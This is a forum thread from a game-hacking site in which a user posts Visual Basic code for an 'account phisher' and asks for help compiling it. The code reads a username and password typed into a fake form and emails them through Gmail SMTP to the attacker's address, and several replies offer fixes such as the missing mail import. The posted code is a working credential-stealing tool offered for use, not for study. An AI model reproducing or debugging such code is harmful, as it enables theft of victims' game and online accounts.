Skip to content
MPGHThe Dark Arts
/
RegisterLog in
Forum
Community
What's NewLatest posts across the boardTrendingHottest threads right nowSubscribedThreads you follow
Discussion
GeneralIntroductionsEntertainmentDebate FortFlaming & Rage
Board
News & AnnouncementsMPGH TimesSuggestions & HelpGiveaways
More Sections
Art & Graphic DesignProgrammingHackingCryptocurrency
Hacks & Cheats
Games
ValorantCS2 / CS:GOCall of Duty / WarzoneFortniteApex LegendsEscape From Tarkov
+14 moreLeague of LegendsGTA VMinecraftRustROTMGBattlefieldTroveBattleOnCombat ArmsCrossFireBlackshotRuneScapeDayZDead by Daylight
Resources
Game Hacking TutorialsReverse EngineeringGeneral Game HackingAnti-CheatConsole Game Hacking
Tools
Game Hacking ToolsTrainers & CheatsHack/Release NewsNew
Submit a release →Share your cheat, tool, or config with the community.
AINEW
AI Tools
General & DiscussionPrompt EngineeringLLM JailbreaksHotAI Agents & AutomationLocal / Open Models
AI × Gaming
AI Aimbots & VisionML Anti-CheatGame Bots & Automation
Create
AI Coding / Vibe CodingAI Art & MediaAI Voice & TTS
The AI frontier →Where game hacking meets modern machine learning. Jump in.
Marketplace
Buy & Sell
SellingBuyingTradingUser Services
Trust & Safety
Middleman LoungeMarketplace TalkVouch Copy Profiles
Money
Cryptocurrency TalkCurrency ExchangeWork & Job Offers
Start selling →List accounts, services, and goods. Use the middleman to trade safe.
MPGH The Dark Arts

A community for offensive security research, reverse engineering, and AI.

Community

ForumMarketplaceSearch

Account

RegisterLog in

Legal

Privacy PolicyForum RulesHelp & FAQ
© 2026 MPGH · All rights reserved.Built by the community, for the community. For educational purposes onlyContent is shared for security research and education — we don't condone illegal use. You're responsible for complying with applicable laws. Use at your own risk.
Home › Forum › Programming › Visual Basic Programming › [HELP!]Account phisher

[HELP!]Account phisher

Posts 1–5 of 5 · Page 1 of 1
Beex
Beex
[HELP!]Account phisher
When i try to compile this it says structe not found help? im new as you can tell but i know i have the potential xD

If TextBox1.Text = "" Then
MsgBox("Username Is Missing")
If Textbox2.text = "" Then
Msgbox("Password Is Missing")
Else
End If
End if
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Your Gmail", "Your Gmail Password")
'using gmail
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Your Gmail")
mail.To.Add("Your Gmail")
mail.Subject = "Username: " & TextBox1.Text
mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & textbox2.text
smtpServer.Send(mail)
MsgBox("Any Error You Want Here")
#1 · 16y ago
Pixie
Pixie
PM me your teamviewer Info, I will see if I can do anything
#2 · 16y ago
guza44_44
guza44_44
this spot prob has the wrong place or port
Code:
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
or you need to import something on top of your code that u didnt
#3 · 16y ago
Zoom
Zoom
Quote Originally Posted by guza44_44 View Post
this spot prob has the wrong place or port
Code:
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
or you need to import something on top of your code that u didnt
You forgot import system.netmail i think!
#4 · 16y ago
NextGen1
NextGen1
Just to point this out (again)

You are behind an ISP that no longer allows SMTP traffic in the form of relay's
Port 587 is now blocked , thats an example code thats a few years old.

Even if you get it to run, it won't be functional.
#5 · 16y ago
Posts 1–5 of 5 · Page 1 of 1

Post a Reply

Similar Threads

  • Crossfire Account PhisherBy Slang in CrossFire Help
    16Last post 15y ago
  • Need Help,account stolenBy Saboteurs in CrossFire Help
    4Last post 15y ago
  • help account relatedBy hahahayea in Combat Arms Help
    2Last post 16y ago
  • [HELP] Account CreatorBy Nickyy in Programming Tutorial Requests
    1Last post 16y ago
  • Help AccountBy x9jake9x in WarRock Korea Hacks
    1Last post 19y ago

Tags for this Thread

None